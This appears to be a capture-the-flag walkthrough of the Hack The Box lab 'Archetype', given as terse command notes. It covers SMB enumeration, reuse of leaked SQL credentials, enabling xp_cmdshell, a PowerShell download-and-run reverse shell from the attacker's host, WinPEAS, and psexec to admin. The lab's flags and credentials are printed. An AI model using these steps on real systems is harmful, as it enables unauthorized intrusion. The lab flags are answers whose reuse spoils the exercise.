[HTB] Archetype

reference

details

nmap scan
- cmd: nmap -sC -sV -A -o nmap.log [Target_IP]
- open smb (p139 & p445) and sql server (Microsoft SQL Server 2017)
- windows os detected

smb guest login allowed (smbclient -L [Target_IP])
- shared folders: ADMIN$, backups, C$, IPC$
- found prod.dtsConfig in backups
  - found Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc (probable sql logins)
using an impacket script for connecting
- cmd: python3 /opt/impacket/examples/mssqlclient.py Archetype/sql_svc@[Target_IP] -windows-auth
- got access to the sql server!
check what priv we have SELECT is_srvrolemember('sysadmin'); (1=T)
xp_cmdshell can be exploited to gain reverse shell (reference: 1, 2)
type following cmds (to enable xp_cmdshell):

EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;

python3 -m http.server on attacker machine (req. for rev sh & winpeas)
now lets get a reverse shell
- download powershell_reverse_shell.ps1 (attacker machine)
- nc -lvnp 4444 (attacker machine)
- xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://[Your_tun0_IP]:8000/powershell_reverse_shell.ps1\");" (sql cmdline)
- got rev shell!
using winpeas
- exec powershell > wget http://[Your_tun0_IP]:8000/winPEASx64.exe -outfile winPEASx64.exe > ./winPEASx64.exe
- found C:\Users\sql_svc\Desktop\user.txt: 3e7b102e78218e935bf3f4951fec21a3
- found C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
- cmd: type C:\<path>\ConsoleHost_history.txt
  - got net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
to login we need psexec.py
- cmd: python3 /opt/impacket/examples/psexec.py administrator@[Target_IP]
- got admin access!
- found C:\Users\Administrator\Desktop\root.txt > b91ccec3305e98240082d4474b848528